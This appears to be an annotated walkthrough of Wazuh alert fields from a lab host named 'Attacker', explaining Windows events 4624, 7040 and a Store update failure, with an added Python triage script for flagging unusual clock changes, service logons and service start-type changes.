data.win.system.message: "Installation Failure: Windows failed to install the following update with error 0x80073D02: 9NZKPSTSNW4P-Microsoft.XboxGamingOverlay." Rendered message text. 0x80073D02 is ERROR_PACKAGES_IN_USE (the app package could not be updated because it was running) and 9NZKPSTSNW4P is a Microsoft Store product ID, so this is a Store app (Xbox Game Bar) update failing, not a security patch. Noise on its own; a run of failures for security updates on the same host is what earns a ticket.
data.win.eventdata.errorCode: 0x80073d02 HRESULT of the failure; decode it with `certutil -error 0x80073d02` on any Windows box.
data.win.eventdata.updateTitle: 9NZKPSTSNW4P-Microsoft.XboxGamingOverlay Update name as reported by the client. Store updates carry the product ID prefix, patches carry the KB number.
data.win.eventdata.updateGuid: {c6a13812-e71e-4775-86f7-c7f3e4982a80} Update ID assigned by the update service; together with the revision number it identifies the exact package.
data.win.eventdata.updateRevisionNumber: 1 Revision of that update ID.
data.win.eventdata.serviceGuid: {855e8a7c-ecb4-4ca3-b045-1dfa50104289} ID of the update service the client talked to. This GUID is the Microsoft Store service rather than Windows Update or WSUS, which matches the Store-app title.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533896.214327 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the event: the Security log's audit provider.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} GUID of that provider; language-independent filter key.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = an account was successfully logged on.
data.win.system.version: 3 Schema version of the event template; version 3 of 4624 is the one that carries the Elevated Token, Virtual Account and Linked Logon ID fields.
data.win.system.level: 0 Numeric level; 0 = Log Always, the value audit events use.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.). 12544 = Logon.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering. 0x8020000000000000 = Audit Success.
data.win.system.systemTime: 2025-04-17T16:55:16.6963122Z UTC time Windows wrote the record; 160 ms after the 4616 above, so the two share a timeline even though their Wazuh alert ids are a week later.
data.win.system.eventRecordID: 43511 Incremental log record number – handy for timeline order. Consecutive to the 4616 (43510).
data.win.system.processID: 792 PID of the process that logged the record; for Security-log logon events this is normally lsass.exe.
data.win.system.threadID: 8104 Thread inside that process. Deep forensics only.
data.win.system.channel: Security Event log channel; 4624 needs the Logon audit subcategory enabled.
data.win.system.computer: Attacker Computer name stamped by Windows; cross-check against agent.name.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Rendered message text. Read it as: services.exe (the Service Control Manager), already running as SYSTEM, created a Logon Type 5 (service) session for SYSTEM in order to start a service. That is textbook benign. The same event with a type 5 logon requested by something other than services.exe, or an interactive or remote type (2, 10) with "Elevated Token: Yes" and a real source address, is the one to chase.
data.win.eventdata.subjectUserSid: S-1-5-18 Well-known SID of NT AUTHORITY\SYSTEM: the account that requested the logon.
data.win.eventdata.subjectUserName: ATTACKER$ The computer account (hostname plus $) is how SYSTEM appears in the Subject block.
data.win.eventdata.subjectDomainName: WORKGROUP Not domain-joined; on a domain member this would be the NetBIOS domain name.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester; 0x3e7 is the fixed SYSTEM session.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account the new session was created for; SYSTEM again.
data.win.eventdata.targetUserName: SYSTEM Account that was logged on. Pivot key for everything that happens in the new session.
data.win.eventdata.targetDomainName: NT AUTHORITY Pseudo-domain for built-in accounts.
data.win.eventdata.targetLogonId: 0x3e7 Session ID of the new logon. Join it to 4688, 4672 and 4634 from the same host to follow the session; 0x3e7 means the SYSTEM session was reused rather than a fresh one created.
data.win.eventdata.logonType: 5 Logon type. 5 = Service (SCM starting a service). 2 = Interactive, 3 = Network and 10 = RemoteInteractive (RDP) are the ones to learn; 9 = NewCredentials is the runas /netonly and pass-the-hash tell.
data.win.eventdata.logonProcessName: Advapi Logon was requested through the LogonUser API (advapi32), normal for services and scheduled tasks. User32 means console logon; NtLmSsp or Kerberos means a network logon.
data.win.eventdata.authenticationPackageName: Negotiate Package that authenticated the logon. Negotiate picks Kerberos or NTLM; Kerberos is impossible here because the host is in a WORKGROUP.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} All zeros = no Kerberos ticket, so nothing to correlate with a 4768/4769 on a DC.
data.win.eventdata.keyLength: 0 Session key length in bits. 0 is normal for local service logons (no session key requested). On NTLM network logons expect 128; 40 or 56 there points at a downgrade.
data.win.eventdata.processId: 0x304 PID (hex) of the requesting process; 0x304 = 772 decimal.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe The Service Control Manager. A type 5 logon requested by any other binary means something called LogonUser with the service logon type itself.
data.win.eventdata.impersonationLevel: %%1833 Placeholder that renders as "Impersonation" (see the message text): the token can impersonate the client on the local system but not across the network.
data.win.eventdata.virtualAccount: %%1843 Placeholder that renders as "No": not a per-service virtual account (NT SERVICE\...).
data.win.eventdata.targetLinkedLogonId: 0x0 Linked (UAC split-token) session; 0x0 = none. A non-zero value pairs an elevated and a filtered session for the same interactive user.
data.win.eventdata.elevatedToken: %%1842 Placeholder that renders as "Yes": the new token is a full administrator token.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 Free-text note from the rule author carried into the alert; here just a compatibility remark.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533899.221663 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager Provider that wrote the event: the SCM (services.exe), reported under its legacy source name.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} GUID of that provider; language-independent filter key.
data.win.system.eventSourceName: Service Control Manager Classic (pre-ETW) event source name; present because this event is written through the legacy event-log API.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 7040 = a service's start type was changed; 7045 is its sibling for a newly installed service.
data.win.system.version: 0 Schema version of the event template.
data.win.system.level: 4 Numeric level; 4 = Information.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.). 0 = none for classic events.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering. 0x8080000000000000 = Classic (legacy event-log API).
data.win.system.systemTime: 2025-04-20T01:51:40.0278198Z UTC time Windows wrote the record; use it, not the alert id, for ordering.
data.win.system.eventRecordID: 2945 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 PID of the logging process: services.exe, the same 0x304 seen as the requesting process in the 4624 events above.
data.win.system.threadID: 11352 Thread inside that process. Deep forensics only.
data.win.system.channel: System Event log channel; always on.
data.win.system.computer: Attacker Computer name stamped by Windows; cross-check against agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Windows Modules Installer service was changed from demand start to auto start." Rendered message text. Windows Update flips TrustedInstaller between demand start and auto start around servicing runs, and the two later 7040 events on this host flip it back and forth again, so this pattern is noise. The same event for a security service (Defender, the event log service, the Wazuh agent) going to "disabled", or a service you did not install going to auto start, is persistence or defence evasion and should page someone.
data.win.eventdata.param1: Windows Modules Installer Display name of the service.
data.win.eventdata.param2: demand start Old start type (auto start, demand start, disabled).
data.win.eventdata.param3: auto start New start type. "disabled" is the value to alert on for security tooling.
data.win.eventdata.param4: TrustedInstaller Short service name (the key under HKLM\SYSTEM\CurrentControlSet\Services). Match rules on this, not on the localisable display name.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533899.223443 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the event: the Security log's audit provider.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} GUID of that provider; language-independent filter key.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = an account was successfully logged on.
data.win.system.version: 3 Schema version of the event template; version 3 of 4624 carries the Elevated Token, Virtual Account and Linked Logon ID fields.
data.win.system.level: 0 Numeric level; 0 = Log Always, the value audit events use.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.). 12544 = Logon.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering. 0x8020000000000000 = Audit Success.
data.win.system.systemTime: 2025-04-20T01:40:35.6633235Z UTC time Windows wrote the record; eleven minutes before the first TrustedInstaller 7040 on this host, consistent with a servicing run starting.
data.win.system.eventRecordID: 43515 Incremental log record number – handy for timeline order. Only four records after the 4624 of 2025-04-17 (43511), so the Security log on this host is quiet.
data.win.system.processID: 792 PID of the process that logged the record; for Security-log logon events this is normally lsass.exe.
data.win.system.threadID: 6624 Thread inside that process. Deep forensics only.
data.win.system.channel: Security Event log channel; 4624 needs the Logon audit subcategory enabled.
data.win.system.computer: Attacker Computer name stamped by Windows; cross-check against agent.name.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Rendered message text. Same shape as the earlier 4624: services.exe, already SYSTEM, creating a type 5 service logon for SYSTEM with no network fields. Benign on its own; it becomes interesting only if a 7045 (new service installed) or a 7040 for an unexpected service lands right after it.
data.win.eventdata.subjectUserSid: S-1-5-18 Well-known SID of NT AUTHORITY\SYSTEM, the requesting account.
data.win.eventdata.subjectUserName: ATTACKER$ Computer account (hostname plus $), how SYSTEM appears in the Subject block.
data.win.eventdata.subjectDomainName: WORKGROUP Not domain-joined.
data.win.eventdata.subjectLogonId: 0x3e7 Fixed SYSTEM logon session.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account logged on; SYSTEM again.
data.win.eventdata.targetUserName: SYSTEM Account that was logged on; pivot key for the new session.
data.win.eventdata.targetDomainName: NT AUTHORITY Pseudo-domain for built-in accounts.
data.win.eventdata.targetLogonId: 0x3e7 Session ID of the new logon; the SYSTEM session was reused. Join on this to 4688/4672/4634 from the same host.
data.win.eventdata.logonType: 5 Logon type 5 = Service. Types 2, 3 and 10 (interactive, network, RDP) are the ones to learn; 9 (NewCredentials) is the runas /netonly and pass-the-hash tell.
data.win.eventdata.logonProcessName: Advapi Requested through the LogonUser API, normal for services and scheduled tasks.
data.win.eventdata.authenticationPackageName: Negotiate Picks Kerberos or NTLM; only NTLM is possible on a WORKGROUP host.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} All zeros = no Kerberos ticket to correlate with a DC's 4768/4769.
data.win.eventdata.keyLength: 0 Session key length in bits; 0 is normal for local service logons. On NTLM network logons expect 128, and 40 or 56 there points at a downgrade.
data.win.eventdata.processId: 0x304 PID (hex) of the requesting process; 772 decimal.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe The Service Control Manager, the only binary that should be requesting type 5 logons.
data.win.eventdata.impersonationLevel: %%1833 Placeholder rendering as "Impersonation": local impersonation only, no network delegation.
data.win.eventdata.virtualAccount: %%1843 Placeholder rendering as "No": not a per-service virtual account.
data.win.eventdata.targetLinkedLogonId: 0x0 No linked UAC split-token session.
data.win.eventdata.elevatedToken: %%1842 Placeholder rendering as "Yes": full administrator token.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 Free-text note from the rule author carried into the alert.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533903.230779 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager Provider that wrote the event: the SCM (services.exe), under its legacy source name.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} GUID of that provider; language-independent filter key.
data.win.system.eventSourceName: Service Control Manager Classic event source name, present because the event is written through the legacy event-log API.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 7040 = a service's start type was changed.
data.win.system.version: 0 Schema version of the event template.
data.win.system.level: 4 Numeric level; 4 = Information.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.). 0 = none for classic events.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering. 0x8080000000000000 = Classic.
data.win.system.systemTime: 2025-04-20T01:54:27.8966188Z UTC time Windows wrote the record; under three minutes after the 01:51:40 change that set this service to auto start.
data.win.system.eventRecordID: 2949 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 PID of the logging process: services.exe.
data.win.system.threadID: 10448 Thread inside that process. Deep forensics only.
data.win.system.channel: System Event log channel; always on.
data.win.system.computer: Attacker Computer name stamped by Windows; cross-check against agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Windows Modules Installer service was changed from auto start to demand start." Rendered message text. This is the reverse of the change logged at 01:51:40: servicing finished and TrustedInstaller went back to demand start, the expected second half of a Windows Update cycle. When you triage 7040, look for the matching reversal; a change that never reverts, or that targets a service you did not expect, is the real signal.
data.win.eventdata.param1: Windows Modules Installer Display name of the service.
data.win.eventdata.param2: auto start Old start type.
data.win.eventdata.param3: demand start New start type (auto start, demand start, disabled).
data.win.eventdata.param4: TrustedInstaller Short service name; the stable key to write rules against.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
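The triage logic the three Windows event types above call for (4616 by changing process and clock delta, 4624 type 5 by requesting process, 7040 by service name and new start type), as an added example that is not code from this page, from Wazuh or from the lab that produced these alerts. It takes alerts in the shape Wazuh writes to alerts.json, resolves the %%NNNN placeholders, and returns findings; the sample alerts are constructed from the field values on the page plus one made-up hostile 4616. The allowlists and the 5-second threshold are assumptions to tune per estate.

```python
"""Triage of the Windows alerts shown above: 4616, 4624 type 5 and 7040.

Added example, not code from the page or from Wazuh. Allowlists and the
5-second threshold are assumptions to tune per estate; the sample alerts are
constructed from the field values on the page plus one made-up hostile case.
"""
from datetime import datetime, timezone
from typing import Dict, List

# Windows message-table placeholders that Wazuh leaves unresolved in eventdata;
# the rendered message text of the 4624 events above confirms these three.
WIN_PLACEHOLDERS = {"%%1833": "Impersonation", "%%1842": "Yes", "%%1843": "No"}

# Assumed benign baselines (hypothetical; tune per estate).
TIME_SERVICE_HOSTS = {r"c:\windows\system32\svchost.exe"}      # hosts W32Time
MAX_BENIGN_TIME_JUMP_SEC = 5.0                                  # bigger jumps get a look
SERVICE_LOGON_BROKERS = {r"c:\windows\system32\services.exe"}  # SCM makes type-5 logons
SERVICING_TOGGLE_SERVICES = {"trustedinstaller"}                # Windows Update flips it


def resolve_placeholders(eventdata: Dict[str, str]) -> Dict[str, str]:
    """Replace %%NNNN codes with their text so rules compare plain values."""
    return {k: WIN_PLACEHOLDERS.get(v, v) for k, v in eventdata.items()}


def parse_win_time(value: str) -> datetime:
    """Parse a 100 ns Windows timestamp such as 2025-04-17T16:55:16.4921369Z.

    Python keeps microseconds, so the seventh fractional digit is dropped."""
    base, _, frac = value.rstrip("Z").partition(".")
    micro = int((frac + "000000")[:6]) if frac else 0
    return datetime.strptime(base, "%Y-%m-%dT%H:%M:%S").replace(
        microsecond=micro, tzinfo=timezone.utc)


def _norm_path(path: str) -> str:
    """alerts.json doubles backslashes; undo that and lower-case for comparison."""
    return path.replace("\\\\", "\\").lower()


def triage(alert: dict) -> List[str]:
    """Return findings for one alert; an empty list means the event looks benign."""
    win = alert.get("data", {}).get("win", {})
    eid = str(win.get("system", {}).get("eventID", ""))
    ev = resolve_placeholders(win.get("eventdata", {}))
    findings: List[str] = []

    if eid == "4616":  # system time changed: who moved the clock, and by how much?
        proc = _norm_path(ev.get("processName", ""))
        delta = abs((parse_win_time(ev["newTime"])
                     - parse_win_time(ev["previousTime"])).total_seconds())
        if proc not in TIME_SERVICE_HOSTS or delta > MAX_BENIGN_TIME_JUMP_SEC:
            findings.append(f"4616: clock moved {delta:.3f}s by {proc} as "
                            f"{ev.get('subjectDomainName')}\\{ev.get('subjectUserName')}")

    elif eid == "4624" and ev.get("logonType") == "5":  # service logon
        proc = _norm_path(ev.get("processName", ""))
        if proc not in SERVICE_LOGON_BROKERS:  # someone other than the SCM called LogonUser
            findings.append(f"4624 type 5 requested by {proc}, target "
                            f"{ev.get('targetUserName')}, elevated={ev.get('elevatedToken')}")

    elif eid == "7040":  # service start type changed (param4 = short service name)
        svc, old, new = ev.get("param4", "").lower(), ev.get("param2"), ev.get("param3")
        if svc not in SERVICING_TOGGLE_SERVICES or new == "disabled":
            findings.append(f"7040: {svc} start type {old} -> {new}")

    return findings


def run(alerts: List[dict]) -> Dict[int, List[str]]:
    """Map alert index -> findings, keeping only alerts with something to say."""
    return {i: f for i, a in enumerate(alerts) if (f := triage(a))}


# Constructed sample alerts: the first three copy values from the page (all
# benign); the fourth is made up, cmd.exe winding the clock back an hour.
SAMPLE_ALERTS = [
    {"data": {"win": {"system": {"eventID": "4616"}, "eventdata": {
        "subjectUserName": "LOCAL SERVICE", "subjectDomainName": "NT AUTHORITY",
        "previousTime": "2025-04-17T16:55:16.4921369Z",
        "newTime": "2025-04-17T16:55:16.5164849Z",
        "processName": "C:\\\\Windows\\\\System32\\\\svchost.exe"}}}},
    {"data": {"win": {"system": {"eventID": "4624"}, "eventdata": {
        "logonType": "5", "targetUserName": "SYSTEM", "elevatedToken": "%%1842",
        "processName": "C:\\\\Windows\\\\System32\\\\services.exe"}}}},
    {"data": {"win": {"system": {"eventID": "7040"}, "eventdata": {
        "param1": "Windows Modules Installer", "param2": "demand start",
        "param3": "auto start", "param4": "TrustedInstaller"}}}},
    {"data": {"win": {"system": {"eventID": "4616"}, "eventdata": {
        "subjectUserName": "bob", "subjectDomainName": "ATTACKER",
        "previousTime": "2025-04-17T17:00:00.0000000Z",
        "newTime": "2025-04-17T16:00:00.0000000Z",
        "processName": "C:\\\\Windows\\\\System32\\\\cmd.exe"}}}},
]

if __name__ == "__main__":
    for index, hits in run(SAMPLE_ALERTS).items():
        print(f"alert {index}:", *hits, sep="\n  ")
```

The placeholder table and the backslash normalisation are what make the eventdata values comparable at all: a rule written as `elevatedToken == "Yes"` never matches the raw `%%1842` in alerts.json, and a path allowlist with single backslashes never matches the doubled ones. Only the fourth sample produces a finding; the page's own three events come back clean.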
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 Free-text note from the rule author carried into the alert.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533903.232559 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager Provider that wrote the event: the SCM (services.exe), under its legacy source name.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} GUID of that provider; language-independent filter key.
data.win.system.eventSourceName: Service Control Manager Classic event source name, present because the event is written through the legacy event-log API.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 7040 = a service's start type was changed.
data.win.system.version: 0 Schema version of the event template.
data.win.system.level: 4 Numeric level; 4 = Information.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.). 0 = none for classic events.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering. 0x8080000000000000 = Classic.
data.win.system.systemTime: 2025-04-20T01:54:42.4352316Z UTC time Windows wrote the record; only fifteen seconds after the 01:54:27 change that set this service back to demand start.
data.win.system.eventRecordID: 2950 Incremental log record number – handy for timeline order. Directly follows the previous 7040 (2949).
data.win.system.processID: 772 PID of the logging process: services.exe.
data.win.system.threadID: 11352 Thread inside that process. Deep forensics only.
data.win.system.channel: System Event log channel; always on.
data.win.system.computer: Attacker Computer name stamped by Windows; cross-check against agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Windows Modules Installer service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Windows Modules Installer No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: TrustedInstaller No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.234339 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:37.9843227Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43519 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9432 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
